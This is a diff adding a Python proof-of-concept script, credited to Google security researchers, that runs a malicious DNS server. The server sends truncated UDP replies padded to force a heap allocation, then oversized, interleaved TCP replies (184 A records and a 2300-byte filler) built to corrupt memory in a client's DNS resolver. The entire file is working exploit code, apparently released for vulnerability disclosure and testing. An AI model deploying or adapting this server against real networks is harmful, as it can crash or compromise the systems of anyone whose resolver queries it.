|
| 1 | +#!/usr/bin/python |
| 2 | +# |
| 3 | +# Copyright 2016 Google Inc |
| 4 | +# |
| 5 | +# Licensed under the Apache License, Version 2.0 (the "License"); |
| 6 | +# you may not use this file except in compliance with the License. |
| 7 | +# You may obtain a copy of the License at |
| 8 | +# |
| 9 | +# http://www.apache.org/licenses/LICENSE-2.0 |
| 10 | +# |
| 11 | +# Unless required by applicable law or agreed to in writing, software |
| 12 | +# distributed under the License is distributed on an "AS IS" BASIS, |
| 13 | +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
| 14 | +# See the License for the specific language governing permissions and |
| 15 | +# limitations under the License. |
| 16 | +# |
| 17 | +# Authors: |
| 18 | +# Fermin J. Serna <[email protected]> |
| 19 | +# Gynvael Coldwind <[email protected]> |
| 20 | +# Thomas Garnier <[email protected]> |
| 21 | + |
| 22 | +import socket |
| 23 | +import time |
| 24 | +import struct |
| 25 | +import threading |
| 26 | + |
| 27 | +IP = '127.0.0.1' # Insert your ip for bind() here... |
| 28 | +ANSWERS1 = 184 |
| 29 | + |
| 30 | +terminate = False |
| 31 | +last_reply = None |
| 32 | +reply_now = threading.Event() |
| 33 | + |
| 34 | + |
| 35 | +def dw(x): |
| 36 | + return struct.pack('>H', x) |
| 37 | + |
| 38 | +def dd(x): |
| 39 | + return struct.pack('>I', x) |
| 40 | + |
| 41 | +def dl(x): |
| 42 | + return struct.pack('<Q', x) |
| 43 | + |
| 44 | +def db(x): |
| 45 | + return chr(x) |
| 46 | + |
| 47 | +def udp_thread(): |
| 48 | + global terminate |
| 49 | + |
| 50 | + # Handle UDP requests |
| 51 | + sock_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) |
| 52 | + sock_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) |
| 53 | + sock_udp.bind((IP, 53)) |
| 54 | + |
| 55 | + reply_counter = 0 |
| 56 | + counter = -1 |
| 57 | + |
| 58 | + answers = [] |
| 59 | + |
| 60 | + while not terminate: |
| 61 | + data, addr = sock_udp.recvfrom(1024) |
| 62 | + print '[UDP] Total Data len recv ' + str(len(data)) |
| 63 | + id_udp = struct.unpack('>H', data[0:2])[0] |
| 64 | + query_udp = data[12:] |
| 65 | + |
| 66 | + # Send truncated flag... so it retries over TCP |
| 67 | + data = dw(id_udp) # id |
| 68 | + data += dw(0x8380) # flags with truncated set |
| 69 | + data += dw(1) # questions |
| 70 | + data += dw(0) # answers |
| 71 | + data += dw(0) # authoritative |
| 72 | + data += dw(0) # additional |
| 73 | + data += query_udp # question |
| 74 | + data += '\x00' * 2500 # Need a long DNS response to force malloc |
| 75 | + |
| 76 | + answers.append((data, addr)) |
| 77 | + |
| 78 | + if len(answers) != 2: |
| 79 | + continue |
| 80 | + |
| 81 | + counter += 1 |
| 82 | + |
| 83 | + if counter % 4 == 2: |
| 84 | + answers = answers[::-1] |
| 85 | + |
| 86 | + time.sleep(0.01) |
| 87 | + sock_udp.sendto(*answers.pop(0)) |
| 88 | + reply_now.wait() |
| 89 | + sock_udp.sendto(*answers.pop(0)) |
| 90 | + |
| 91 | + sock_udp.close() |
| 92 | + |
| 93 | + |
| 94 | +def tcp_thread(): |
| 95 | + global terminate |
| 96 | + counter = -1 |
| 97 | + |
| 98 | + #Open TCP socket |
| 99 | + sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
| 100 | + sock_tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) |
| 101 | + sock_tcp.bind((IP, 53)) |
| 102 | + sock_tcp.listen(10) |
| 103 | + |
| 104 | + while not terminate: |
| 105 | + conn, addr = sock_tcp.accept() |
| 106 | + counter += 1 |
| 107 | + print 'Connected with ' + addr[0] + ':' + str(addr[1]) |
| 108 | + |
| 109 | + # Read entire packet |
| 110 | + data = conn.recv(1024) |
| 111 | + print '[TCP] Total Data len recv ' + str(len(data)) |
| 112 | + |
| 113 | + reqlen1 = socket.ntohs(struct.unpack('H', data[0:2])[0]) |
| 114 | + print '[TCP] Request1 len recv ' + str(reqlen1) |
| 115 | + data1 = data[2:2+reqlen1] |
| 116 | + id1 = struct.unpack('>H', data1[0:2])[0] |
| 117 | + query1 = data[12:] |
| 118 | + |
| 119 | + # Do we have an extra request? |
| 120 | + data2 = None |
| 121 | + if len(data) > 2+reqlen1: |
| 122 | + reqlen2 = socket.ntohs(struct.unpack('H', data[2+reqlen1:2+reqlen1+2])[0]) |
| 123 | + print '[TCP] Request2 len recv ' + str(reqlen2) |
| 124 | + data2 = data[2+reqlen1+2:2+reqlen1+2+reqlen2] |
| 125 | + id2 = struct.unpack('>H', data2[0:2])[0] |
| 126 | + query2 = data2[12:] |
| 127 | + |
| 128 | + # Reply them on different packets |
| 129 | + data = '' |
| 130 | + data += dw(id1) # id |
| 131 | + data += dw(0x8180) # flags |
| 132 | + data += dw(1) # questions |
| 133 | + data += dw(ANSWERS1) # answers |
| 134 | + data += dw(0) # authoritative |
| 135 | + data += dw(0) # additional |
| 136 | + data += query1 # question |
| 137 | + |
| 138 | + for i in range(ANSWERS1): |
| 139 | + answer = dw(0xc00c) # name compressed |
| 140 | + answer += dw(1) # type A |
| 141 | + answer += dw(1) # class |
| 142 | + answer += dd(13) # ttl |
| 143 | + answer += dw(4) # data length |
| 144 | + answer += 'D' * 4 # data |
| 145 | + |
| 146 | + data += answer |
| 147 | + |
| 148 | + data1_reply = dw(len(data)) + data |
| 149 | + |
| 150 | + if data2: |
| 151 | + data = '' |
| 152 | + data += dw(id2) |
| 153 | + data += 'B' * (2300) |
| 154 | + data2_reply = dw(len(data)) + data |
| 155 | + else: |
| 156 | + data2_reply = None |
| 157 | + |
| 158 | + reply_now.set() |
| 159 | + time.sleep(0.01) |
| 160 | + conn.sendall(data1_reply) |
| 161 | + time.sleep(0.01) |
| 162 | + if data2: |
| 163 | + conn.sendall(data2_reply) |
| 164 | + |
| 165 | + reply_now.clear() |
| 166 | + |
| 167 | + sock_tcp.shutdown(socket.SHUT_RDWR) |
| 168 | + sock_tcp.close() |
| 169 | + |
| 170 | + |
| 171 | +if __name__ == "__main__": |
| 172 | + |
| 173 | + t = threading.Thread(target=udp_thread) |
| 174 | + t.daemon = True |
| 175 | + t.start() |
| 176 | + tcp_thread() |
| 177 | + terminate = True |
| 178 | + |
0 commit comments